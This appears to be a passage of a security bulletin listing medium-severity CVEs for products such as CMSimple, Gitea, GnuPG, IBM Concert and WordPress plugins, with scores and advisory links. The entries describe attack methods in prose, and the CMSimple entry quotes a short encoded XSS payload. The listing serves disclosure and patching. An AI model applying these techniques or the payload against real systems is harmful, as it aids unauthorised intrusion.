| Cmsimple--CMSimple | CMSimple 5.4 contains a cross-site scripting vulnerability that allows attackers to bypass input filtering by using HTML to Unicode encoding. Attackers can inject malicious scripts by encoding payloads like ')-alert(1)// and execute arbitrary JavaScript when victims interact with delete buttons. | 2025-12-23 | 6.1 | CVE-2021-47733 | ExploitDB-50612 CMSimple Official Homepage VulnCheck Advisory: CMSimple 5.4 Cross-Site Scripting via HTML Unicode Encoding |
| Cmsimple--CMSimple | CMSimple 5.4 contains an authenticated local file inclusion vulnerability that allows remote attackers to manipulate PHP session files and execute arbitrary code. Attackers can leverage the vulnerability by changing the functions file path and uploading malicious PHP code through session file upload mechanisms. | 2025-12-23 | 5.5 | CVE-2021-47734 | ExploitDB-50547 Official CMSimple Homepage VulnCheck Advisory: CMSimple 5.4 Authenticated Local File Inclusion Remote Code Execution |
| Cobiansoft--Cobian Backup Gravity | Cobian Backup 11 Gravity 11.2.0.582 contains a denial of service vulnerability in the FTP password input field that allows attackers to crash the application. Attackers can generate a specially crafted 800-byte buffer and paste it into the password field to trigger an application crash. | 2025-12-22 | 6.2 | CVE-2022-50687 | ExploitDB-50790 Cobian Backup Official Vendor Homepage VulnCheck Advisory: Cobian Backup 11 Gravity 11.2.0.582 Local Denial of Service via Password Field |
| Cobiansoft--Cobian Reflector | Cobian Reflector 0.9.93 RC1 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the password input field. Attackers can paste a large 8000-byte buffer into the password field to trigger an application crash during SFTP task configuration. | 2025-12-22 | 6.2 | CVE-2022-50689 | ExploitDB-50789 Cobian Software Official Homepage VulnCheck Advisory: Cobian Reflector 0.9.93 RC1 Local Denial of Service via Password Field |
| code-projects--Student File Management System | A security vulnerability has been detected in code-projects Student File Management System 1.0. This affects an unknown part of the file /save_file.php. Such manipulation of the argument File leads to unrestricted upload. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-24 | 6.3 | CVE-2025-15050 | VDB-337857 \| code-projects Student File Management System save_file.php unrestricted upload VDB-337857 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721073 \| Code-Projects Student File Management System V1.0 Arbitrary File Upload Submit #721039 \| code-projects.org Student File Management System V1.0 File Upload (Duplicate) https://github.com/Bai-public/CVE/issues/3 https://code-projects.org/ |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor). This issue affects TheGem Theme Elements (for Elementor): from n/a through 5.10.5.1. | 2025-12-23 | 6.5 | CVE-2025-68559 | https://vdp.patchstack.com/database/wordpress/plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Cszcms--CSZ CMS | CSZ CMS 1.2.7 contains a persistent cross-site scripting vulnerability that allows unauthorized users to embed malicious JavaScript in private messages. Attackers can send messages with script payloads in the user-agent header, which will execute when an admin views the message in the backend dashboard. | 2025-12-23 | 6.4 | CVE-2021-47738 | ExploitDB-48354 Official CSZ CMS Vendor Homepage CSZ CMS SourceForge Project VulnCheck Advisory: CSZ CMS 1.2.7 Persistent Cross-Site Scripting via Private Messaging |
| Cszcms--CSZ CMS | CSZ CMS 1.2.7 contains an HTML injection vulnerability that allows authenticated users to insert malicious hyperlinks in message titles. Attackers can craft POST requests to the member messaging system with HTML-based links to potentially conduct phishing or social engineering attacks. | 2025-12-23 | 5.4 | CVE-2021-47737 | ExploitDB-48357 Official CSZ CMS Vendor Homepage CSZ CMS SourceForge Project VulnCheck Advisory: CSZ CMS 1.2.7 HTML Injection Vulnerability via Member Dashboard |
| dayrui--XunRuiCMS | A weakness has been identified in dayrui XunRuiCMS up to 4.7.1. The impacted element is the function dr_show_error/dr_exit_msg of the file /dayrui/Fcms/Init.php of the component JSONP Callback Handler. This manipulation of the argument callback causes cross site scripting. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 4.3 | CVE-2025-15144 | VDB-338522 \| dayrui XunRuiCMS JSONP Callback Init.php dr_exit_msg cross site scripting VDB-338522 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #716122 \| xunruicms 4.7.1 xss https://note-hxlab.wetolink.com/share/gbCf35DJ3los |
| Delta Electronics--DVP15MC11T | Delta Electronics DVP15MC11T lacks proper validation of the modbus/tcp packets and can lead to denial of service. | 2025-12-22 | 4 | CVE-2025-59301 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00020_DVP15MC11T%20Modbus%20TCP%20DoS%20Vulnerability.pdf |
| devolo AG--dLAN 550 duo+ Starter Kit | Devolo dLAN 500 AV Wireless+ 3.1.0-1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that trigger unauthorized configuration changes by exploiting predictable URL actions when a logged-in user visits the site. | 2025-12-24 | 5.3 | CVE-2019-25250 | ExploitDB-46324 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5507) |
| Eaton--UPS Companion software | Improper quoting of search paths in the Eaton UPS Companion software installer could lead to arbitrary code execution by an attacker with access to the file system. This security issue has been fixed in the latest version of EUC, which is available on the Eaton download center. | 2025-12-26 | 6.7 | CVE-2025-59888 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1026.pdf |
| Ecessa Corporation--Ecessa Edge EV150 | Ecessa Edge EV150 10.7.4 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. Attackers can craft a malicious web page with a form that submits requests to the /cgi-bin/pl_web.cgi/util_configlogin_act endpoint to add superuser accounts with arbitrary credentials. | 2025-12-24 | 5.3 | CVE-2018-25152 | ExploitDB-44932 Ecessa Corporation Product Homepage |
| Ecessa Corporation--Ecessa ShieldLink SL175EHQ | Ecessa ShieldLink SL175EHQ 10.7.4 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without authentication. Attackers can craft a malicious web page with a hidden form to add a superuser account by tricking a logged-in administrator into loading the page. | 2025-12-24 | 5.3 | CVE-2018-25150 | ExploitDB-44938 Ecessa Corporation Product Homepage |
| Ecessa Corporation--WANWorx WVR-30 | Ecessa WANWorx WVR-30 versions before 10.7.4 contain a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. Attackers can craft a malicious web page with a hidden form to create a new superuser account by tricking an authenticated administrator into loading the page. | 2025-12-24 | 4.3 | CVE-2018-25151 | ExploitDB-44936 Ecessa Corporation Official Website |
| Echo Call Center Services Trade and Industry Inc.--Specto CM | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Echo Call Center Services Trade and Industry Inc. Specto CM allows Stored XSS. This issue affects Specto CM: before 17032025. | 2025-12-24 | 5.4 | CVE-2025-2154 | https://www.usom.gov.tr/bildirim/tr-25-0480 |
| floooh--sokol | A vulnerability was identified in floooh sokol up to 5d11344150973f15e16d3ec4ee7550a73fb995e0. The impacted element is the function _sg_validate_pipeline_desc in the library sokol_gfx.h. Such manipulation leads to stack-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The name of the patch is b95c5245ba357967220c9a860c7578a7487937b0. It is best practice to apply a patch to resolve this issue. | 2025-12-22 | 5.3 | CVE-2025-15013 | VDB-337719 \| floooh sokol sokol_gfx.h _sg_validate_pipeline_desc stack-based overflow VDB-337719 \| CTI Indicators (IOB, IOC, IOA) Submit #719820 \| floooh sokol e0832c9 Stack-based Buffer Overflow https://github.com/floooh/sokol/issues/1404 https://github.com/seyhajin/sokol/pull/246 https://github.com/oneafter/1212/blob/main/stack1 https://github.com/seyhajin/sokol/commit/b95c5245ba357967220c9a860c7578a7487937b0 |
| floooh--sokol | A vulnerability was detected in floooh sokol up to 16cbcc864012898793cd2bc57f802499a264ea40. The impacted element is the function _sg_pipeline_desc_defaults in the library sokol_gfx.h. The manipulation results in stack-based buffer overflow. The attack requires a local approach. The exploit is now public and may be used. This product does not use versioning, which is why information about affected and unaffected releases is unavailable. The patch is identified as 5d11344150973f15e16d3ec4ee7550a73fb995e0. It is advisable to implement a patch to correct this issue. | 2025-12-28 | 5.3 | CVE-2025-15155 | VDB-338533 \| floooh sokol sokol_gfx.h _sg_pipeline_desc_defaults stack-based overflow VDB-338533 \| CTI Indicators (IOB, IOC, IOA) Submit #719823 \| floooh sokol e0832c9 Stack-based Buffer Overflow https://github.com/floooh/sokol/issues/1405 https://github.com/floooh/sokol/issues/1406#issuecomment-3649548096 https://github.com/oneafter/1212/blob/main/hbf1 https://github.com/floooh/sokol/commit/5d11344150973f15e16d3ec4ee7550a73fb995e0 |
| FreshRSS--FreshRSS | FreshRSS is a free, self-hostable RSS aggregator. From version 1.27.0 to before 1.28.0, an attacker could globally deny access to feeds by using a proxy to modify responses to 429 Retry-After for a large list of feeds on a given instance, making it unusable for the majority of users. This issue has been patched in version 1.28.0. | 2025-12-26 | 4.3 | CVE-2025-68148 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-qw34-frg7-gf78 https://github.com/FreshRSS/FreshRSS/pull/8029 https://github.com/FreshRSS/FreshRSS/commit/7d4854a0a4f5665db599f18c34035786465639f3 |
| Fujitsu / Fsas Technologies--ETERNUS SF ACM/SC/Express | Fujitsu / Fsas Technologies ETERNUS SF ACM/SC/Express (DX / AF Management Software) before 16.8-16.9.1 PA 2025-12, when collected maintenance data is accessible by a principal/authority other than ETERNUS SF Admin, allows an attacker to potentially affect system confidentiality, integrity, and availability. | 2025-12-24 | 5.6 | CVE-2025-68919 | https://security.ts.fujitsu.com/ProductSecurity/content/FsasTech-PSIRT-FTI-STR-2025-111413-Security-Notice.pdf |
| getmaxun--maxun | A weakness has been identified in getmaxun maxun up to 0.0.28. The affected element is the function router.get of the file server/src/routes/auth.ts of the component Authentication Endpoint. Executing manipulation can lead to improper authorization. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-27 | 6.3 | CVE-2025-15106 | VDB-338477 \| getmaxun Authentication Endpoint auth.ts router.get improper authorization VDB-338477 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #710268 \| https://github.com/getmaxun https://github.com/getmaxun/maxun ≤ v0.0.28 Authentication Bypass Issues https://gist.github.com/H2u8s/1a0bdb19d5c8c8f4dc72cb49ffe9a22b |
| Gitea--Gitea | Gitea before 1.22.2 allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text. | 2025-12-26 | 5.4 | CVE-2025-68942 | https://blog.gitea.com/release-of-1.22.2/ https://github.com/go-gitea/gitea/releases/tag/v1.22.2 https://github.com/go-gitea/gitea/pull/31966 |
| Gitea--Gitea | Gitea before 1.21.8 inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order. | 2025-12-26 | 5.3 | CVE-2025-68943 | https://blog.gitea.com/release-of-1.21.8-and-1.21.9-and-1.21.10/ https://github.com/go-gitea/gitea/releases/tag/v1.21.8 https://github.com/go-gitea/gitea/pull/29430 |
| Gitea--Gitea | Gitea before 1.22.2 sometimes mishandles the propagation of token scope for access control within one of its own package registries. | 2025-12-26 | 5 | CVE-2025-68944 | https://blog.gitea.com/release-of-1.22.2/ https://github.com/go-gitea/gitea/releases/tag/v1.22.2 https://github.com/go-gitea/gitea/pull/31967 |
| Gitea--Gitea | In Gitea before 1.21.2, an anonymous user can visit a private user's project. | 2025-12-26 | 5.8 | CVE-2025-68945 | https://blog.gitea.com/release-of-1.21.2/ https://github.com/go-gitea/gitea/releases/tag/v1.21.2 https://github.com/go-gitea/gitea/pull/28423 |
| Gitea--Gitea | In Gitea before 1.20.1, a forbidden URL scheme such as javascript: can be used for a link, aka XSS. | 2025-12-26 | 5.4 | CVE-2025-68946 | https://blog.gitea.com/release-of-1.20.1/ https://github.com/go-gitea/gitea/releases/tag/v1.20.1 https://github.com/go-gitea/gitea/pull/25960 |
| Gitea--Gitea | Gitea before 1.25.2 mishandles authorization for deletion of releases. | 2025-12-26 | 4.3 | CVE-2025-68938 | https://blog.gitea.com/release-of-1.25.2/ https://github.com/go-gitea/gitea/releases/tag/v1.25.2 https://github.com/go-gitea/gitea/pull/36002/commits/d4262131b39899d9e9ee5caa2635c810d476e43f#diff-8962bac89952027d50fa51f31f59d65bedb4c02bde0265eced5cf256cbed306d |
| Gitea--Gitea | Gitea before 1.22.3 mishandles access to a private resource upon receiving an API token with scope limited to public resources. | 2025-12-26 | 4.9 | CVE-2025-68941 | https://blog.gitea.com/release-of-1.22.3/ https://github.com/go-gitea/gitea/releases/tag/v1.22.3 https://github.com/go-gitea/gitea/pull/32218 |
| GnuPG--GnuPG | In GnuPG through 2.4.8, if a signed message has \f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an "invalid armor" message is printed during verification). This is related to use of \f as a marker to denote truncation of a long plaintext line. | 2025-12-27 | 5.9 | CVE-2025-68972 | https://gpg.fail/formfeed https://news.ycombinator.com/item?id=46404339 |
| Guangzhou V-SOLUTION Electronic Technology Co., Ltd.--SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform 2.03 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to create admin users, enable SSH, or modify system settings by tricking authenticated administrators into loading a specially crafted page. | 2025-12-24 | 4.3 | CVE-2019-25238 | ExploitDB-47434 V-SOL Product Homepage Zero Science Lab Disclosure (ZSL-2019-5536) |
| h-moses--moga-mall | A vulnerability was identified in h-moses moga-mall up to 392d631a5ef15962a9bddeeb9f1269b9085473fa. This vulnerability affects the function addProduct of the file src/main/java/com/ms/product/controller/PmsProductController.java. Such manipulation of the argument objectName leads to unrestricted upload. The attack may be performed remotely. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. | 2025-12-28 | 6.3 | CVE-2025-15152 | VDB-338529 \| h-moses moga-mall PmsProductController.java addProduct unrestricted upload VDB-338529 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721988 \| https://github.com/h-moses/moga-mall moga-mall 1.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/moga-mall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| Hasura--Hasura GraphQL | Hasura GraphQL 1.3.3 contains a local file read vulnerability that allows attackers to access system files through SQL injection in the query endpoint. Attackers can exploit the pg_read_file() PostgreSQL function by crafting malicious SQL queries to read arbitrary files on the server. | 2025-12-22 | 5.5 | CVE-2021-47714 | ExploitDB-49790 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 Local File Read via SQL Injection |
| Hasura--Hasura GraphQL | Hasura GraphQL 1.3.3 contains a server-side request forgery vulnerability that allows attackers to inject arbitrary remote schema URLs through the add_remote_schema endpoint. Attackers can exploit the vulnerability by sending crafted POST requests to the /v1/query endpoint with malicious URL definitions to potentially access internal network resources. | 2025-12-22 | 5.3 | CVE-2021-47715 | ExploitDB-49791 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 Server-Side Request Forgery via Remote Schema Injection |
| IBM--Aspera Faspex 5 | IBM Aspera Faspex 5 5.0.0 through 5.0.14.1 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. | 2025-12-26 | 5.4 | CVE-2025-36230 | https://www.ibm.com/support/pages/node/7255331 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 stores sensitive information in cleartext during recursive docker builds which could be obtained by a local user. | 2025-12-24 | 6.2 | CVE-2025-36154 | https://www.ibm.com/support/pages/node/7255549 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory. | 2025-12-26 | 5.9 | CVE-2025-1721 | https://www.ibm.com/support/pages/node/7255549 |
| IBM--Db2 Intelligence Center | IBM Db2 Intelligence Center 1.1.0, 1.1.1, 1.1.2 could allow an authenticated user to perform unauthorized actions due to client-side enforcement of server-side security mechanisms. | 2025-12-26 | 4.3 | CVE-2025-14687 | https://www.ibm.com/support/pages/node/7255160 |
| IBM--DS8A00 (R10.1) | IBM DS8A00 (R10.1) 10.10.106.0 and IBM DS8A00 (R10.0) 10.1.3.010.2.45.0 and IBM DS8900F (R9.4) 89.40.83.089.42.18.089.44.5.0 IBM System Storage DS8000 could allow a local user with authorized CCW update permissions to delete or corrupt backups due to missing authorization in IBM Safeguarded Copy / GDPS Logical corruption protection mechanisms. | 2025-12-26 | 6.7 | CVE-2025-36192 | https://www.ibm.com/support/pages/node/7255039 |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to change administrator passwords, add new admin users, or open access control doors by tricking authenticated users into loading a specially crafted webpage. | 2025-12-24 | 4.3 | CVE-2019-25242 | ExploitDB-47065 Vendor Product Homepage Zero Science Lab Disclosure (ZSL-2019-5524) |
| jackq--XCMS | A vulnerability has been found in jackq XCMS up to 3fab5342cc509945a7ce1b8ec39d19f701b89261. Affected is the function Upload of the file Admin/Home/Controller/ProductImageController.class.php of the component Backend. Such manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-27 | 4.7 | CVE-2025-15110 | VDB-338481 \| jackq XCMS Backend ProductImageController.class.php upload unrestricted upload VDB-338481 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #711702 \| XCMS 1.1 Unrestricted Upload https://gitee.com/jackq/XCMS/issues/IDC5C8 |
| jcthiele--OpenXRechnungToolbox | OpenXRechnungToolbox through 2024-10-05-3.0.0 before 6c50e89 allows XXE because the disallow-doctype-decl feature is not enabled in visualization/VisualizerImpl.java. | 2025-12-24 | 5 | CVE-2024-58335 | https://github.com/jcthiele/OpenXRechnungToolbox/commit/6c50e8979924b09f336c976cbad3a9ebfe25ebf9 https://invoice.secvuln.info |
| JD--Cloud BE6500 | A vulnerability has been found in JD Cloud BE6500 4.4.1.r4308. This issue affects the function sub_4780 of the file /jdcapi. Such manipulation of the argument ddns_name leads to command injection. The attack may be performed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 6.3 | CVE-2025-15081 | VDB-338409 \| JD Cloud BE6500 jdcapi sub_4780 command injection VDB-338409 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #707276 \| JD cloud 京东云 JD Cloud BE6500 4.4.1.r4308 Command Injection https://gist.github.com/isstabber/4ed3554130681e50b3e987c3c4ee1f29 |
| Jewel Theme--Master Addons for Elementor | Missing Authorization vulnerability in Jewel Theme Master Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Master Addons for Elementor: from n/a through 2.0.5.3. | 2025-12-24 | 6.5 | CVE-2023-40679 | https://vdp.patchstack.com/database/wordpress/plugin/master-addons/vulnerability/wordpress-master-elementor-addons-plugin-2-0-3-broken-access-control-vulnerability?_s_id=cve |
| joey-zhou--xiaozhi-esp32-server-java | A weakness has been identified in joey-zhou xiaozhi-esp32-server-java up to 3.0.0. This impacts the function tryAuthenticateWithCookies of the file AuthenticationInterceptor.java of the component Cookie Handler. Executing manipulation can lead to improper authentication. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. Upgrading to version 4.0.0 will fix this issue. It is recommended to upgrade the affected component. | 2025-12-28 | 6.3 | CVE-2025-15135 | VDB-338513 \| joey-zhou xiaozhi-esp32-server-java Cookie AuthenticationInterceptor.java tryAuthenticateWithCookies improper authentication VDB-338513 \| CTI Indicators (IOB, IOC, IOA) Submit #713990 \| joey-zhou xiaozhi-esp32-server-java V3.0.0 Improper Authentication https://github.com/joey-zhou/xiaozhi-esp32-server-java/issues/143 https://github.com/joey-zhou/xiaozhi-esp32-server-java/issues/143#issuecomment-3666534810 https://github.com/joey-zhou/xiaozhi-esp32-server-java/issues/143#issue-3722315701 https://github.com/joey-zhou/xiaozhi-esp32-server-java/releases/tag/v4.0.0 |
| ketr--JEPaaS | A vulnerability was detected in ketr JEPaaS up to 7.2.8. Affected by this vulnerability is the function postilService.loadPostils of the file /je/postil/postil/loadPostil. Performing manipulation of the argument keyWord results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-25 | 6.3 | CVE-2025-15088 | VDB-338416 \| ketr JEPaaS loadPostil postilService.loadPostils sql injection VDB-338416 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #708321 \| 北京凯特伟业科技有限公司 jepaas v7.2.8 SQL Injection https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/jepaas-v7.2.8-sqlinject1.md https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/jepaas-v7.2.8-sqlinject1.md#2%E5%A4%8D%E7%8E%B0replicate |
| kieranoshea--Calendar | The Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'event_desc' parameter in all versions up to, and including, 1.3.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can convince an administrator to enable lower privilege users to manage calendar events via the plugin settings. | 2025-12-23 | 6.4 | CVE-2025-14548 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2e61489d-a433-4d44-bb12-8c84204922b9?source=cve https://plugins.trac.wordpress.org/browser/calendar/trunk/calendar.php#L2154 https://plugins.trac.wordpress.org/browser/calendar/trunk/calendar.php#L899 https://plugins.trac.wordpress.org/changeset?new=3419088%40calendar%2Ftrunk&old=3122280%40calendar%2Ftrunk |
| Kunal Nagar--Custom 404 Pro | Cross-Site Request Forgery (CSRF) vulnerability in Kunal Nagar Custom 404 Pro allows Cross Site Request Forgery. This issue affects Custom 404 Pro: from n/a through 3.12.0. | 2025-12-22 | 4.3 | CVE-2025-62880 | https://vdp.patchstack.com/database/wordpress/plugin/custom-404-pro/vulnerability/wordpress-custom-404-pro-plugin-3-12-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| KYOCERA Corporation--KYOCERA Net Admin | KYOCERA Net Admin 3.4.0906 contains a cross-site request forgery vulnerability that allows attackers to create administrative users without proper request validation. Attackers can craft malicious web pages that automatically submit forms to add new admin accounts with predefined credentials when a logged-in user visits the page. | 2025-12-24 | 5.3 | CVE-2019-25254 | ExploitDB-44431 KYOCERA Official Website Zero Science Lab Disclosure (ZSL-2018-5458) |
| leap13--Premium Addons for Elementor Powerful Elementor Templates & Widgets | The Premium Addons for Elementor - Powerful Elementor Templates & Widgets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_template_content' function in all versions up to, and including, 4.11.53. This makes it possible for unauthenticated attackers to view the content of private, draft, and pending templates. | 2025-12-23 | 5.3 | CVE-2025-14155 | https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624 https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L90 https://plugins.trac.wordpress.org/changeset/3416254/ |
| leap13--Premium Addons for Elementor Powerful Elementor Templates & Widgets | The Premium Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.11.53. This is due to missing nonce validation in the 'insert_inner_template' function. This makes it possible for unauthenticated attackers to create arbitrary Elementor templates via a forged request granted they can trick a site administrator or other user with the edit_posts capability into performing an action such as clicking on a link. | 2025-12-23 | 4.3 | CVE-2025-14163 | https://www.wordfence.com/threat-intel/vulnerabilities/id/77b57f2a-0b46-4b4a-bdca-1c5218d739ce?source=cve https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L246 https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/templates/classes/manager.php#L40 https://plugins.trac.wordpress.org/changeset/3416254/ |
| LearningCircuit--local-deep-research | Local Deep Research is an AI-powered research assistant for deep, iterative research. In versions from 1.3.0 to before 1.3.9, the download service (download_service.py) makes HTTP requests using raw requests.get() without utilizing the application's SSRF protection (safe_requests.py). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls. This issue has been patched in version 1.3.9. | 2025-12-23 | 6.3 | CVE-2025-67743 | https://github.com/LearningCircuit/local-deep-research/security/advisories/GHSA-9c54-gxh7-ppjc https://github.com/LearningCircuit/local-deep-research/commit/b79089ff30c5d9ae77e6b903c408e1c26ad5c055 |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.12.0, the Alert Rule API is vulnerable to stored cross-site scripting. Alert rules can be created or updated via LibreNMS API. The alert rule name is not properly sanitized, and can be used to inject HTML code. This issue has been patched in version 25.12.0. | 2025-12-22 | 4.3 | CVE-2025-68614 | https://github.com/librenms/librenms/security/advisories/GHSA-c89f-8g7g-59wj https://github.com/librenms/librenms/commit/ebe6c79bf4ce0afeb575c1285afe3934e44001f1 |
| liweiyi--ChestnutCMS | A flaw has been found in liweiyi ChestnutCMS up to 1.5.8. This vulnerability affects the function FilenameUtils.getExtension of the file /dev-api/common/upload of the component Filename Handler. Executing manipulation of the argument File can lead to unrestricted upload. The attack may be launched remotely. The exploit has been published and may be used. | 2025-12-22 | 6.3 | CVE-2025-15009 | VDB-337715 \| liweiyi ChestnutCMS Filename upload FilenameUtils.getExtension unrestricted upload VDB-337715 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #719590 \| liweiyi ChestnutCMS <=1.5.8 Unrestricted Upload https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md#vulnerability-proof |
| loganhong--php loganSite | A security flaw has been discovered in loganhong php loganSite up to c035fb5c3edd0b2a5e32fd4051cbbc9e61a31426. This affects an unknown function of the file /includes/article_detail.php of the component Article Handler. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. | 2025-12-22 | 6.3 | CVE-2025-15014 | VDB-337720 \| loganhong php loganSite Article article_detail.php sql injection VDB-337720 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #720037 \| loganhong php 1 SQL Injection https://github.com/ssiled/cve/issues/1 |
| LogicalDOC Srl--LogicalDOC Enterprise | LogicalDOC Enterprise 7.7.4 contains multiple authenticated OS command execution vulnerabilities that allow attackers to manipulate binary paths when changing system settings. Attackers can exploit these vulnerabilities by modifying configuration parameters like antivirus.command, ocr.Tesseract.path, and other system paths to execute arbitrary system commands with elevated privileges. | 2025-12-24 | 6.5 | CVE-2019-25257 | ExploitDB-44021 Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5452) |
| macrozheng--mall | A security vulnerability has been detected in macrozheng mall up to 1.0.3. This vulnerability affects unknown code of the file /member/address/update/ of the component Member Endpoint. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-28 | 4.3 | CVE-2025-15118 | VDB-338496 \| macrozheng mall Member Endpoint update improper authorization VDB-338496 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #711758 \| mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/31 |
| marshmallow-code--marshmallow | Marshmallow is a lightweight library for converting complex objects to and from simple Python datatypes. In versions from 3.0.0rc1 to before 3.26.2 and from 4.0.0 to before 4.1.2, Schema.load(data, many=True) is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time. This issue has been patched in versions 3.26.2 and 4.1.2. | 2025-12-22 | 5.3 | CVE-2025-68480 | https://github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5 https://github.com/marshmallow-code/marshmallow/commit/d24a0c9df061c4daa92f71cf85aca25b83eee508 |
| Mattermost--Mattermost | Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fail to validate user channel membership when attaching Mattermost posts as comments to Jira issues, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to. | 2025-12-24 | 4.3 | CVE-2025-13767 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fail to verify that post actions invoking /share-issue-publicly were created by the Jira plugin, which allowed a malicious Mattermost user to exfiltrate Jira tickets when victim users interacted with affected posts. | 2025-12-24 | 4.1 | CVE-2025-64641 | MMSA-2025-00551 |
